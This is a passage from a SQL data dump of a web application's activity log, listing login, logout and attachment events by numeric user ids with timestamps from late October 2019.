14:38:55',NULL),(21482,2,'Attachment',181,'2019-10-25 14:38:55','2019-10-25 14:38:55',NULL),(21483,50,'Login',50,'2019-10-25 14:39:05','2019-10-25 14:39:05',NULL),(21484,59,'Login',59,'2019-10-25 14:39:19','2019-10-25 14:39:19',NULL),(21485,49,'Logout',49,'2019-10-25 14:40:11','2019-10-25 14:40:11',NULL),(21486,50,'Login',50,'2019-10-25 14:40:20','2019-10-25 14:40:20',NULL),(21487,50,'Logout',50,'2019-10-25 14:40:24','2019-10-25 14:40:24',NULL),(21488,49,'Login',49,'2019-10-25 14:40:33','2019-10-25 14:40:33',NULL),(21489,59,'Logout',59,'2019-10-25 14:44:05','2019-10-25 14:44:05',NULL),(21490,49,'Login',49,'2019-10-25 14:44:11','2019-10-25 14:44:11',NULL),(21491,59,'Login',59,'2019-10-25 14:48:50','2019-10-25 14:48:50',NULL),(21492,50,'Attachment',781,'2019-10-25 14:57:18','2019-10-25 14:57:18',NULL),(21493,46,'Login',46,'2019-10-25 15:07:29','2019-10-25 15:07:29',NULL),(21494,49,'Login',49,'2019-10-25 15:17:34','2019-10-25 15:17:34',NULL),(21495,49,'Logout',49,'2019-10-25 15:42:51','2019-10-25 15:42:51',NULL),(21496,2,'Attachment',181,'2019-10-25 15:42:52','2019-10-25 15:42:52',NULL),(21497,2,'Attachment',29,'2019-10-25 15:42:52','2019-10-25 15:42:52',NULL),(21498,2,'Attachment',288,'2019-10-25 15:42:52','2019-10-25 15:42:52',NULL),(21499,2,'Attachment',416,'2019-10-25 15:42:52','2019-10-25 15:42:52',NULL),(21500,2,'Attachment',24,'2019-10-25 15:42:52','2019-10-25 15:42:52',NULL),(21501,2,'Attachment',419,'2019-10-25 15:42:52','2019-10-25 15:42:52',NULL),(21502,2,'Attachment',757,'2019-10-25 15:42:52','2019-10-25 15:42:52',NULL),(21503,50,'Login',50,'2019-10-25 15:43:02','2019-10-25 15:43:02',NULL),(21504,59,'Attachment',812,'2019-10-25 16:14:47','2019-10-25 16:14:47',NULL),(21505,50,'Logout',50,'2019-10-25 16:26:56','2019-10-25 16:26:56',NULL),(21506,49,'Login',49,'2019-10-25 16:27:04','2019-10-25 16:27:04',NULL),(21507,2,'Attachment',757,'2019-10-26 00:02:30','2019-10-26 00:02:30',NULL),(21508,2,'Attachment',29,'2019-10-26 00:02:30','2019-10-26 00:02:30',NULL),(21509,2,'Attachment',416,'2019-10-26 00:02:30','2019-10-26 00:02:30',NULL),(21510,2,'Attachment',24,'2019-10-26 00:02:30','2019-10-26 00:02:30',NULL),(21511,2,'Attachment',288,'2019-10-26 00:02:31','2019-10-26 00:02:31',NULL),(21512,2,'Attachment',181,'2019-10-26 00:02:31','2019-10-26 00:02:31',NULL),(21513,2,'Attachment',419,'2019-10-26 00:02:31','2019-10-26 00:02:31',NULL),(21514,2,'Attachment',755,'2019-10-26 00:09:24','2019-10-26 00:09:24',NULL),(21515,2,'Attachment',539,'2019-10-26 00:09:24','2019-10-26 00:09:24',NULL),(21516,2,'Attachment',541,'2019-10-26 00:09:26','2019-10-26 00:09:26',NULL),(21517,2,'Attachment',371,'2019-10-26 00:09:29','2019-10-26 00:09:29',NULL),(21518,2,'Attachment',69,'2019-10-26 00:09:29','2019-10-26 00:09:29',NULL),(21519,2,'Attachment',180,'2019-10-26 00:09:29','2019-10-26 00:09:29',NULL),(21520,2,'Attachment',403,'2019-10-26 00:09:29','2019-10-26 00:09:29',NULL),(21521,2,'Attachment',354,'2019-10-26 00:09:29','2019-10-26 00:09:29',NULL),(21522,2,'Attachment',753,'2019-10-26 00:09:31','2019-10-26 00:09:31',NULL),(21523,2,'Attachment',535,'2019-10-26 00:09:31','2019-10-26 00:09:31',NULL),(21524,2,'Attachment',546,'2019-10-26 00:09:31','2019-10-26 00:09:31',NULL),(21525,2,'Attachment',538,'2019-10-26 00:09:37','2019-10-26 00:09:37',NULL),(21526,50,'Login',50,'2019-10-26 10:21:38','2019-10-26 10:21:38',NULL),(21527,2,'Attachment',29,'2019-10-27 14:01:35','2019-10-27 14:01:35',NULL),(21528,2,'Attachment',288,'2019-10-27 14:01:35','2019-10-27 14:01:35',NULL),(21529,2,'Attachment',24,'2019-10-27 14:01:35','2019-10-27 14:01:35',NULL),(21530,2,'Attachment',757,'2019-10-27 14:01:35','2019-10-27 14:01:35',NULL),(21531,2,'Attachment',416,'2019-10-27 14:01:35','2019-10-27 14:01:35',NULL),(21532,2,'Attachment',419,'2019-10-27 14:01:35','2019-10-27 14:01:35',NULL),(21533,2,'Attachment',181,'2019-10-27 14:01:36','2019-10-27 14:01:36',NULL),(21534,49,'Login',49,'2019-10-27 14:01:42','2019-10-27 14:01:42',NULL),(21535,2,'Attachment',757,'2019-10-27 14:02:37','2019-10-27 14:02:37',NULL),(21536,2,'Attachment',29,'2019-10-27 14:02:37','2019-10-27 14:02:37',NULL),(21537,2,'Attachment',419,'2019-10-27 14:02:37','2019-10-27 14:02:37',NULL),(21538,2,'Attachment',24,'2019-10-27 14:02:37','2019-10-27 14:02:37',NULL),(21539,2,'Attachment',181,'2019-10-27 14:02:37','2019-10-27 14:02:37',NULL),(21540,2,'Attachment',288,'2019-10-27 14:02:37','2019-10-27 14:02:37',NULL),(21541,2,'Attachment',416,'2019-10-27 14:02:37','2019-10-27 14:02:37',NULL),(21542,46,'Login',46,'2019-10-27 14:02:46','2019-10-27 14:02:46',NULL),(21543,2,'Attachment',757,'2019-10-27 14:03:16','2019-10-27 14:03:16',NULL),(21544,2,'Attachment',29,'2019-10-27 14:03:16','2019-10-27 14:03:16',NULL),(21545,2,'Attachment',24,'2019-10-27 14:03:16','2019-10-27 14:03:16',NULL),(21546,59,'Login',59,'2019-10-27 14:03:29','2019-10-27 14:03:29',NULL),(21547,50,'Login',50,'2019-10-27 14:10:12','2019-10-27 14:10:12',NULL),(21548,59,'Login',59,'2019-10-27 14:10:39','2019-10-27 14:10:39',NULL),(21549,59,'Login',59,'2019-10-27 14:19:14','2019-10-27 14:19:14',NULL),(21550,46,'Attachment',830,'2019-10-27 14:45:32','2019-10-27 14:45:32',NULL),(21551,2,'Attachment',757,'2019-10-27 15:09:06','2019-10-27 15:09:06',NULL),(21552,2,'Attachment',419,'2019-10-27 15:09:06','2019-10-27 15:09:06',NULL),(21553,2,'Attachment',288,'2019-10-27 15:09:06','2019-10-27 15:09:06',NULL),(21554,2,'Attachment',29,'2019-10-27 15:09:06','2019-10-27 15:09:06',NULL),(21555,2,'Attachment',416,'2019-10-27 15:09:06','2019-10-27 15:09:06',NULL),(21556,2,'Attachment',24,'2019-10-27 15:09:06','2019-10-27 15:09:06',NULL),(21557,2,'Attachment',181,'2019-10-27 15:09:07','2019-10-27 15:09:07',NULL),(21558,2,'Attachment',539,'2019-10-27 15:09:13','2019-10-27 15:09:13',NULL),(21559,2,'Attachment',541,'2019-10-27 15:09:13','2019-10-27 15:09:13',NULL),(21560,2,'Attachment',535,'2019-10-27 15:09:13','2019-10-27 15:09:13',NULL),(21561,2,'Attachment',538,'2019-10-27 15:09:13','2019-10-27 15:09:13',NULL),(21562,2,'Attachment',403,'2019-10-27 15:09:13','2019-10-27 15:09:13',NULL),(21563,2,'Attachment',757,'2019-10-28 08:42:47','2019-10-28 08:42:47',NULL),(21564,2,'Attachment',29,'2019-10-28 08:42:48','2019-10-28 08:42:48',NULL),(21565,2,'Attachment',24,'2019-10-28 08:42:49','2019-10-28 08:42:49',NULL),(21566,2,'Attachment',416,'2019-10-28 08:42:49','2019-10-28 08:42:49',NULL),(21567,2,'Attachment',181,'2019-10-28 08:42:49','2019-10-28 08:42:49',NULL),(21568,2,'Attachment',419,'2019-10-28 08:42:50','2019-10-28 08:42:50',NULL),(21569,50,'Login',50,'2019-10-28 08:43:21','2019-10-28 08:43:21',NULL),(21570,50,'Login',50,'2019-10-28 08:57:48','2019-10-28 08:57:48',NULL),(21571,50,'Login',50,'2019-10-28 09:34:03','2019-10-28 09:34:03',NULL),(21572,50,'Logout',50,'2019-10-28 09:34:29','2019-10-28 09:34:29',NULL),(21573,2,'Attachment',288,'2019-10-28 09:34:29','2019-10-28 09:34:29',NULL),(21574,2,'Attachment',181,'2019-10-28 09:34:30','2019-10-28 09:34:30',NULL),(21575,49,'Login',49,'2019-10-28 09:34:38','2019-10-28 09:34:38',NULL),(21576,50,'Attachment',546,'2019-10-28 10:02:07','2019-10-28 10:02:07',NULL),(21577,50,'Attachment',535,'2019-10-28 10:02:07','2019-10-28 10:02:07',NULL),(21578,50,'Attachment',753,'2019-10-28 10:02:07','2019-10-28 10:02:07',NULL),(21579,50,'Attachment',538,'2019-10-28 10:02:07','2019-10-28 10:02:07',NULL),(21580,50,'Attachment',539,'2019-10-28 10:02:08','2019-10-28 10:02:08',NULL),(21581,50,'Attachment',755,'2019-10-28 10:02:08','2019-10-28 10:02:08',NULL),(21582,50,'Attachment',541,'2019-10-28 10:02:08','2019-10-28 10:02:08',NULL),(21583,50,'Attachment',403,'2019-10-28 10:02:09','2019-10-28 10:02:09',NULL),(21584,50,'Attachment',371,'2019-10-28 10:02:09','2019-10-28 10:02:09',NULL),(21585,50,'Attachment',354,'2019-10-28 10:02:09','2019-10-28 10:02:09',NULL),(21586,50,'Attachment',180,'2019-10-28 10:02:09','2019-10-28 10:02:09',NULL),(21587,50,'Attachment',69,'2019-10-28 10:02:09','2019-10-28 10:02:09',NULL),(21588,2,'Attachment',288,'2019-10-28 11:14:22','2019-10-28 11:14:22',NULL),(21589,2,'Attachment',757,'2019-10-28 11:14:23','2019-10-28 11:14:23',NULL),(21590,2,'Attachment',24,'2019-10-28 11:14:23','2019-10-28 11:14:23',NULL),(21591,2,'Attachment',181,'2019-10-28 11:14:24','2019-10-28 11:14:24',NULL),(21592,2,'Attachment',29,'2019-10-28 11:14:24','2019-10-28 11:14:24',NULL),(21593,2,'Attachment',416,'2019-10-28 11:14:24','2019-10-28 11:14:24',NULL),(21594,2,'Attachment',419,'2019-10-28 11:14:24','2019-10-28 11:14:24',NULL),(21595,59,'Login',59,'2019-10-28 11:14:36','2019-10-28 11:14:36',NULL),(21596,59,'Login',59,'2019-10-28 11:19:33','2019-10-28 11:19:33',NULL),(21597,59,'Logout',59,'2019-10-28 11:20:02','2019-10-28 11:20:02',NULL),(21598,49,'Login',49,'2019-10-28 11:20:24','2019-10-28 11:20:24',NULL),(21599,49,'Logout',49,'2019-10-28 11:20:49','2019-10-28 11:20:49',NULL),(21600,46,'Login',46,'2019-10-28 11:21:02','2019-10-28 11:21:02',NULL),(21601,50,'Attachment',757,'2019-10-28 14:26:12','2019-10-28 14:26:12',NULL),(21602,50,'Attachment',181,'2019-10-28 14:26:12','2019-10-28 14:26:12',NULL),(21603,50,'Attachment',416,'2019-10-28 14:26:13','2019-10-28 14:26:13',NULL),(21604,50,'Attachment',24,'2019-10-28 14:26:13','2019-10-28 14:26:13',NULL),(21605,50,'Attachment',419,'2019-10-28 14:26:13','2019-10-28 14:26:13',NULL),(21606,50,'Attachment',29,'2019-10-28 14:26:13','2019-10-28 14:26:13',NULL),(21607,50,'Attachment',288,'2019-10-28 14:26:13','2019-10-28 14:26:13',NULL),(21608,2,'Attachment',757,'2019-10-28 14:54:09','2019-10-28 14:54:09',NULL),(21609,2,'Attachment',29,'2019-10-28 14:54:09','2019-10-28 14:54:09',NULL),(21610,2,'Attachment',24,'2019-10-28 14:54:09','2019-10-28 14:54:09',NULL),(21611,2,'Attachment',419,'2019-10-28 14:54:09','2019-10-28 14:54:09',NULL),(21612,2,'Attachment',288,'2019-10-28 14:54:09','2019-10-28 14:54:09',NULL),(21613,2,'Attachment',416,'2019-10-28 14:54:09','2019-10-28 14:54:09',NULL),(21614,2,'Attachment',181,'2019-10-28 14:54:09','2019-10-28 14:54:09',NULL),(21615,32,'Login',32,'2019-10-28 14:56:04','2019-10-28 14:56:04',NULL),(21616,32,'Attachment',535,'2019-10-28 14:59:29','2019-10-28 14:59:29',NULL),(21617,32,'Attachment',753,'2019-10-28 14:59:29','2019-10-28 14:59:29',NULL),(21618,32,'Attachment',546,'2019-10-28 14:59:29','2019-10-28 14:59:29',NULL),(21619,32,'Attachment',538,'2019-10-28 14:59:29','2019-10-28 14:59:29',NULL),(21620,32,'Attachment',755,'2019-10-28 14:59:30','2019-10-28 14:59:30',NULL),(21621,32,'Attachment',539,'2019-10-28 14:59:30','2019-10-28 14:59:30',NULL),(21622,32,'Attachment',541,'2019-10-28 14:59:31','2019-10-28 14:59:31',NULL),(21623,32,'Attachment',371,'2019-10-28 14:59:31','2019-10-28 14:59:31',NULL),(21624,32,'Attachment',403,'2019-10-28 14:59:31','2019-10-28 14:59:31',NULL),(21625,32,'Attachment',354,'2019-10-28 14:59:31','2019-10-28 14:59:31',NULL),(21626,32,'Attachment',180,'2019-10-28 14:59:31','2019-10-28 14:59:31',NULL),(21627,32,'Attachment',69,'2019-10-28 14:59:31','2019-10-28 14:59:31',NULL),(21628,32,'Logout',32,'2019-10-28 15:01:18','2019-10-28 15:01:18',NULL),(21629,41,'Login',41,'2019-10-28 15:07:12','2019-10-28 15:07:12',NULL),(21630,32,'Login',32,'2019-10-28 15:10:39','2019-10-28 15:10:39',NULL),(21631,2,'Attachment',757,'2019-10-28 17:52:21','2019-10-28 17:52:21',NULL),(21632,2,'Attachment',29,'2019-10-28 17:52:21','2019-10-28 17:52:21',NULL),(21633,2,'Attachment',24,'2019-10-28 17:52:21','2019-10-28 17:52:21',NULL),(21634,2,'Attachment',416,'2019-10-28 17:52:21','2019-10-28 17:52:21',NULL),(21635,2,'Attachment',419,'2019-10-28 17:52:21','2019-10-28 17:52:21',NULL),(21636,2,'Attachment',288,'2019-10-28 17:52:21','2019-10-28 17:52:21',NULL),(21637,2,'Attachment',181,'2019-10-28 17:52:21','2019-10-28 17:52:21',NULL),(21638,46,'Login',46,'2019-10-29 08:21:38','2019-10-29 08:21:38',NULL),(21639,2,'Attachment',757,'2019-10-29 08:23:34','2019-10-29 08:23:34',NULL),(21640,2,'Attachment',29,'2019-10-29 08:23:34','2019-10-29 08:23:34',NULL),(21641,2,'Attachment',24,'2019-10-29 08:23:34','2019-10-29 08:23:34',NULL),(21642,2,'Attachment',416,'2019-10-29 08:23:35','2019-10-29 08:23:35',NULL),(21643,2,'Attachment',288,'2019-10-29 08:23:35','2019-10-29 08:23:35',NULL),(21644,2,'Attachment',419,'2019-10-29 08:23:35','2019-10-29 08:23:35',NULL),(21645,2,'Attachment',181,'2019-10-29 08:23:35','2019-10-29 08:23:35',NULL),(21646,49,'Login',49,'2019-10-29 08:23:52','2019-10-29 08:23:52',NULL),(21647,59,'Login',59,'2019-10-29 08:24:16','2019-10-29 08:24:16',NULL),(21648,59,'Login',59,'2019-10-29 08:28:56','2019-10-29 08:28:56',NULL),(21649,49,'Login',49,'2019-10-29 08:29:17','2019-10-29 08:29:17',NULL),(21650,49,'Login',49,'2019-10-29 08:38:55','2019-10-29 08:38:55',NULL),(21651,49,'Login',49,'2019-10-29 08:41:08','2019-10-29 08:41:08',NULL),(21652,59,'Login',59,'2019-10-29 08:41:32','2019-10-29 08:41:32',NULL),(21653,49,'Logout',49,'2019-10-29 08:52:16','2019-10-29 08:52:16',NULL),(21654,2,'Attachment',757,'2019-10-29 08:52:16','2019-10-29 08:52:16',NULL),(21655,2,'Attachment',29,'2019-10-29 08:52:16','2019-10-29 08:52:16',NULL),(21656,2,'Attachment',419,'2019-10-29 08:52:16','2019-10-29 08:52:16',NULL),(21657,2,'Attachment',416,'2019-10-29 08:52:16','2019-10-29 08:52:16',NULL),(21658,2,'Attachment',24,'2019-10-29 08:52:16','2019-10-29 08:52:16',NULL),(21659,2,'Attachment',288,'2019-10-29 08:52:16','2019-10-29 08:52:16',NULL),(21660,2,'Attachment',181,'2019-10-29 08:52:16','2019-10-29 08:52:16',NULL),(21661,50,'Login',50,'2019-10-29 08:52:39','2019-10-29 08:52:39',NULL),(21662,46,'Attachment',757,'2019-10-29 09:00:23','2019-10-29 09:00:23',NULL),(21663,46,'Attachment',29,'2019-10-29 09:00:23','2019-10-29 09:00:23',NULL),(21664,46,'Attachment',24,'2019-10-29 09:00:23','2019-10-29 09:00:23',NULL),(21665,46,'Attachment',416,'2019-10-29 09:00:23','2019-10-29 09:00:23',NULL),(21666,46,'Attachment',419,'2019-10-29 09:00:24','2019-10-29 09:00:24',NULL),(21667,46,'Attachment',288,'2019-10-29 09:00:24','2019-10-29 09:00:24',NULL),(21668,59,'Logout',59,'2019-10-29 09:01:57','2019-10-29 09:01:57',NULL),(21669,2,'Attachment',757,'2019-10-29 09:01:59','2019-10-29 09:01:59',NULL),(21670,2,'Attachment',24,'2019-10-29 09:02:00','2019-10-29 09:02:00',NULL),(21671,2,'Attachment',416,'2019-10-29 09:02:00','2019-10-29 09:02:00',NULL),(21672,2,'Attachment',419,'2019-10-29 09:02:00','2019-10-29 09:02:00',NULL),(21673,2,'Attachment',29,'2019-10-29 09:02:00','2019-10-29 09:02:00',NULL),(21674,2,'Attachment',288,'2019-10-29 09:02:00','2019-10-29 09:02:00',NULL),(21675,2,'Attachment',181,'2019-10-29 09:02:00','2019-10-29 09:02:00',NULL),(21676,50,'Login',50,'2019-10-29 09:04:22','2019-10-29 09:04:22',NULL),(21677,49,'Login',49,'2019-10-29 09:04:48','2019-10-29 09:04:48',NULL),(21678,49,'Logout',49,'2019-10-29 09:05:20','2019-10-29 09:05:20',NULL),(21679,59,'Login',59,'2019-10-29 09:05:29','2019-10-29 09:05:29',NULL),(21680,59,'Logout',59,'2019-10-29 09:26:05','2019-10-29 09:26:05',NULL),(21681,50,'Login',50,'2019-10-29 09:26:13','2019-10-29 09:26:13',NULL),(21682,50,'Logout',50,'2019-10-29 09:32:52','2019-10-29 09:32:52',NULL),(21683,2,'Attachment',757,'2019-10-29 09:32:52','2019-10-29 09:32:52',NULL),(21684,2,'Attachment',29,'2019-10-29 09:32:52','2019-10-29 09:32:52',NULL),(21685,2,'Attachment',24,'2019-10-29 09:32:52','2019-10-29 09:32:52',NULL),(21686,2,'Attachment',419,'2019-10-29 09:32:52','2019-10-29 09:32:52',NULL),(21687,2,'Attachment',416,'2019-10-29 09:32:52','2019-10-29 09:32:52',NULL),(21688,2,'Attachment',288,'2019-10-29 09:32:52','2019-10-29 09:32:52',NULL),(21689,2,'Attachment',181,'2019-10-29 09:32:52','2019-10-29 09:32:52',NULL),(21690,59,'Login',59,'2019-10-29 09:33:17','2019-10-29 09:33:17',NULL),(21691,50,'Login',50,'2019-10-29 09:49:18','2019-10-29 09:49:18',NULL),(21692,46,'Logout',46,'2019-10-29 09:50:57','2019-10-29 09:50:57',NULL),(21693,2,'Attachment',29,'2019-10-29 09:50:58','2019-10-29 09:50:58',NULL),(21694,2,'Attachment',24,'2019-10-29 09:50:58','2019-10-29 09:50:58',NULL),(21695,50,'Login',50,'2019-10-29 09:51:15','2019-10-29 09:51:15',NULL),(21696,59,'Logout',59,'2019-10-29 09:51:40','2019-10-29 09:51:40',NULL),(21697,2,'Attachment',757,'2019-10-29 09:51:41','2019-10-29 09:51:41',NULL),(21698,2,'Attachment',29,'2019-10-29 09:51:41','2019-10-29 09:51:41',NULL),(21699,2,'Attachment',416,'2019-10-29 09:51:41','2019-10-29 09:51:41',NULL),(21700,2,'Attachment',24,'2019-10-29 09:51:41','2019-10-29 09:51:41',NULL),(21701,50,'Login',50,'2019-10-29 09:51:46','2019-10-29 09:51:46',NULL),(21702,49,'Logout',49,'2019-10-29 09:52:09','2019-10-29 09:52:09',NULL),(21703,2,'Attachment',29,'2019-10-29 09:52:09','2019-10-29 09:52:09',NULL),(21704,2,'Attachment',419,'2019-10-29 09:52:09','2019-10-29 09:52:09',NULL),(21705,2,'Attachment',288,'2019-10-29 09:52:09','2019-10-29 09:52:09',NULL),(21706,2,'Attachment',181,'2019-10-29 09:52:09','2019-10-29 09:52:09',NULL),(21707,50,'Login',50,'2019-10-29 09:52:21','2019-10-29 09:52:21',NULL),(21708,50,'Logout',50,'2019-10-29 09:54:25','2019-10-29 09:54:25',NULL),(21709,50,'Login',50,'2019-10-29 09:54:48','2019-10-29 09:54:48',NULL),(21710,2,'Attachment',757,'2019-10-29 09:55:00','2019-10-29 09:55:00',NULL),(21711,2,'Attachment',29,'2019-10-29 09:55:00','2019-10-29 09:55:00',NULL),(21712,2,'Attachment',24,'2019-10-29 09:55:01','2019-10-29 09:55:01',NULL),(21713,2,'Attachment',416,'2019-10-29 09:55:01','2019-10-29 09:55:01',NULL),(21714,2,'Attachment',419,'2019-10-29 09:55:01','2019-10-29 09:55:01',NULL),(21715,2,'Attachment',288,'2019-10-29 09:55:01','2019-10-29 09:55:01',NULL),(21716,2,'Attachment',181,'2019-10-29 09:55:01','2019-10-29 09:55:01',NULL),(21717,50,'Logout',50,'2019-10-29 09:56:18','2019-10-29 09:56:18',NULL),(21718,2,'Attachment',757,'2019-10-29 09:56:18','2019-10-29 09:56:18',NULL),(21719,2,'Attachment',29,'2019-10-29 09:56:18','2019-10-29 09:56:18',NULL),(21720,2,'Attachment',416,'2019-10-29 09:56:18','2019-10-29 09:56:18',NULL),(21721,2,'Attachment',419,'2019-10-29 09:56:18','2019-10-29 09:56:18',NULL),(21722,2,'Attachment',24,'2019-10-29 09:56:18','2019-10-29 09:56:18',NULL),(21723,2,'Attachment',288,'2019-10-29 09:56:18','2019-10-29 09:56:18',NULL),(21724,2,'Attachment',181,'2019-10-29 09:56:18','2019-10-29 09:56:18',NULL),(21725,50,'Login',50,'2019-10-29 09:56:45','2019-10-29 09:56:45',NULL),(21726,50,'Login',50,'2019-10-29 09:57:44','2019-10-29 09:57:44',NULL),(21727,50,'Login',50,'2019-10-29 10:00:51','2019-10-29 10:00:51',NULL),(21728,60,'Attachment',823,'2019-10-29 10:03:29','2019-10-29 10:03:29',NULL),(21729,60,'Attachment',822,'2019-10-29 10:03:34','2019-10-29 10:03:34',NULL),(21730,2,'Attachment',757,'2019-10-29 10:45:24','2019-10-29 10:45:24',NULL),(21731,2,'Attachment',29,'2019-10-29 10:45:24','2019-10-29 10:45:24',NULL),(21732,2,'Attachment',416,'2019-10-29 10:45:24','2019-10-29 10:45:24',NULL),(21733,2,'Attachment',419,'2019-10-29 10:45:24','2019-10-29 10:45:24',NULL),(21734,2,'Attachment',24,'2019-10-29 10:45:24','2019-10-29 10:45:24',NULL),(21735,2,'Attachment',181,'2019-10-29 10:45:24','2019-10-29 10:45:24',NULL),(21736,2,'Attachment',288,'2019-10-29 10:45:24','2019-10-29 10:45:24',NULL),(21737,2,'Attachment',29,'2019-10-29 11:34:08','2019-10-29 11:34:08',NULL),(21738,2,'Attachment',757,'2019-10-29 11:34:08','2019-10-29 11:34:08',NULL),(21739,2,'Attachment',181,'2019-10-29 11:34:08','2019-10-29 11:34:08',NULL),(21740,2,'Attachment',419,'2019-10-29 11:34:08','2019-10-29 11:34:08',NULL),(21741,2,'Attachment',288,'2019-10-29 11:34:08','2019-10-29 11:34:08',NULL),(21742,2,'Attachment',24,'2019-10-29 11:34:08','2019-10-29 11:34:08',NULL),(21743,2,'Attachment',416,'2019-10-29 11:34:09','2019-10-29 11:34:09',NULL),(21744,50,'Login',50,'2019-10-29 11:44:15','2019-10-29 11:44:15',NULL),(21745,50,'Logout',50,'2019-10-29 12:34:48','2019-10-29 12:34:48',NULL),(21746,2,'Attachment',29,'2019-10-29 12:34:48','2019-10-29 12:34:48',NULL),(21747,2,'Attachment',24,'2019-10-29 12:34:48','2019-10-29 12:34:48',NULL),(21748,2,'Attachment',416,'2019-10-29 12:34:48','2019-10-29 12:34:48',NULL),(21749,2,'Attachment',419,'2019-10-29 12:34:48','2019-10-29 12:34:48',NULL),(21750,2,'Attachment',757,'2019-10-29 12:34:48','2019-10-29 12:34:48',NULL),(21751,2,'Attachment',288,'2019-10-29 12:34:48','2019-10-29 12:34:48',NULL),(21752,2,'Attachment',181,'2019-10-29 12:34:49','2019-10-29 12:34:49',NULL),(21753,49,'Login',49,'2019-10-29 12:34:54','2019-10-29 12:34:54',NULL),(21754,50,'Logout',50,'2019-10-29 12:36:39','2019-10-29 12:36:39',NULL),(21755,2,'Attachment',24,'2019-10-29 12:36:39','2019-10-29 12:36:39',NULL),(21756,2,'Attachment',419,'2019-10-29 12:36:39','2019-10-29 12:36:39',NULL),(21757,2,'Attachment',288,'2019-10-29 12:36:39','2019-10-29 12:36:39',NULL),(21758,2,'Attachment',416,'2019-10-29 12:36:39','2019-10-29 12:36:39',NULL),(21759,59,'Login',59,'2019-10-29 12:37:31','2019-10-29 12:37:31',NULL),(21760,50,'Logout',50,'2019-10-29 12:49:33','2019-10-29 12:49:33',NULL),(21761,2,'Attachment',757,'2019-10-29 12:49:33','2019-10-29 12:49:33',NULL),(21762,46,'Login',46,'2019-10-29 12:54:58','2019-10-29 12:54:58',NULL),(21763,46,'Attachment',29,'2019-10-29 12:56:39','2019-10-29 12:56:39',NULL),(21764,46,'Logout',46,'2019-10-29 12:57:14','2019-10-29 12:57:14',NULL),(21765,2,'Attachment',24,'2019-10-29 12:57:15','2019-10-29 12:57:15',NULL),(21766,2,'Attachment',757,'2019-10-29 12:57:15','2019-10-29 12:57:15',NULL),(21767,46,'Login',46,'2019-10-29 14:35:40','2019-10-29 14:35:40',NULL),(21768,46,'Attachment',416,'2019-10-29 15:36:28','2019-10-29 15:36:28',NULL),(21769,46,'Attachment',288,'2019-10-29 15:36:28','2019-10-29 15:36:28',NULL),(21770,46,'Attachment',419,'2019-10-29 15:36:28','2019-10-29 15:36:28',NULL),(21771,46,'Attachment',181,'2019-10-29 15:36:28','2019-10-29 15:36:28',NULL),(21772,59,'Logout',59,'2019-10-29 16:42:01','2019-10-29 16:42:01',NULL),(21773,2,'Attachment',757,'2019-10-29 16:42:01','2019-10-29 16:42:01',NULL),(21774,2,'Attachment',416,'2019-10-29 16:42:01','2019-10-29 16:42:01',NULL),(21775,2,'Attachment',419,'2019-10-29 16:42:01','2019-10-29 16:42:01',NULL),(21776,2,'Attachment',29,'2019-10-29 16:42:01','2019-10-29 16:42:01',NULL),(21777,2,'Attachment',24,'2019-10-29 16:42:01','2019-10-29 16:42:01',NULL),(21778,59,'Login',59,'2019-10-29 16:47:46','2019-10-29 16:47:46',NULL),(21779,50,'Attachment',757,'2019-10-29 17:02:25','2019-10-29 17:02:25',NULL),(21780,50,'Attachment',29,'2019-10-29 17:02:25','2019-10-29 17:02:25',NULL),(21781,50,'Attachment',24,'2019-10-29 17:02:25','2019-10-29 17:02:25',NULL),(21782,50,'Attachment',416,'2019-10-29 17:02:25','2019-10-29 17:02:25',NULL),(21783,50,'Attachment',419,'2019-10-29 17:02:25','2019-10-29 17:02:25',NULL),(21784,50,'Attachment',288,'2019-10-29 17:02:25','2019-10-29 17:02:25',NULL),(21785,50,'Attachment',181,'2019-10-29 17:02:25','2019-10-29 17:02:25',NULL),(21786,50,'Logout',50,'2019-10-29 17:02:28','2019-10-29 17:02:28',NULL),(21787,61,'Logout',61,'2019-10-29 17:07:45','2019-10-29 17:07:45',NULL),(21788,59,'Logout',59,'2019-10-29 17:09:12','2019-10-29 17:09:12',NULL),(21789,2,'Attachment',24,'2019-10-29 17:09:12','2019-10-29 17:09:12',NULL),(21790,2,'Attachment',416,'2019-10-29 17:09:12','2019-10-29 17:09:12',NULL),(21791,2,'Attachment',288,'2019-10-29 17:09:12','2019-10-29 17:09:12',NULL),(21792,2,'Attachment',181,'2019-10-29 17:09:12','2019-10-29 17:09:12',NULL),(21793,61,'Login',61,'2019-10-29 17:09:28','2019-10-29 17:09:28',NULL),(21794,61,'Logout',61,'2019-10-29 17:09:48','2019-10-29 17:09:48',NULL),(21795,2,'Attachment',757,'2019-10-29 17:09:48','2019-10-29 17:09:48',NULL),(21796,2,'Attachment',29,'2019-10-29 17:09:48','2019-10-29 17:09:48',NULL),(21797,62,'Login',62,'2019-10-29 17:09:55','2019-10-29 17:09:55',NULL),(21798,62,'Logout',62,'2019-10-29 17:12:46','2019-10-29 17:12:46',NULL),(21799,2,'Attachment',29,'2019-10-29 17:12:46','2019-10-29 17:12:46',NULL),(21800,2,'Attachment',288,'2019-10-29 17:12:46','2019-10-29 17:12:46',NULL),(21801,61,'Login',61,'2019-10-29 17:12:54','2019-10-29 17:12:54',NULL),(21802,61,'Attachment',24,'2019-10-29 17:15:59','2019-10-29 17:15:59',NULL),(21803,61,'Attachment',416,'2019-10-29 17:15:59','2019-10-29 17:15:59',NULL),(21804,61,'Attachment',29,'2019-10-29 17:15:59','2019-10-29 17:15:59',NULL),(21805,61,'Attachment',757,'2019-10-29 17:15:59','2019-10-29 17:15:59',NULL),(21806,61,'Attachment',757,'2019-10-29 17:58:19','2019-10-29 17:58:19',NULL),(21807,61,'Attachment',24,'2019-10-29 17:58:19','2019-10-29 17:58:19',NULL),(21808,49,'Logout',49,'2019-10-29 18:03:52','2019-10-29 18:03:52',NULL),(21809,50,'Login',50,'2019-10-29 18:04:03','2019-10-29 18:04:03',NULL),(21810,2,'Attachment',757,'2019-10-29 21:15:02','2019-10-29 21:15:02',NULL),(21811,2,'Attachment',29,'2019-10-29 21:15:02','2019-10-29 21:15:02',NULL),(21812,2,'Attachment',24,'2019-10-29 21:15:02','2019-10-29 21:15:02',NULL),(21813,2,'Attachment',419,'2019-10-29 21:15:02','2019-10-29 21:15:02',NULL),(21814,2,'Attachment',181,'2019-10-29 21:15:02','2019-10-29 21:15:02',NULL),(21815,2,'Attachment',416,'2019-10-29 21:15:02','2019-10-29 21:15:02',NULL),(21816,2,'Attachment',288,'2019-10-29 21:15:02','2019-10-29 21:15:02',NULL),(21817,32,'Login',32,'2019-10-29 21:15:20','2019-10-29 21:15:20',NULL),(21818,49,'Login',49,'2019-10-30 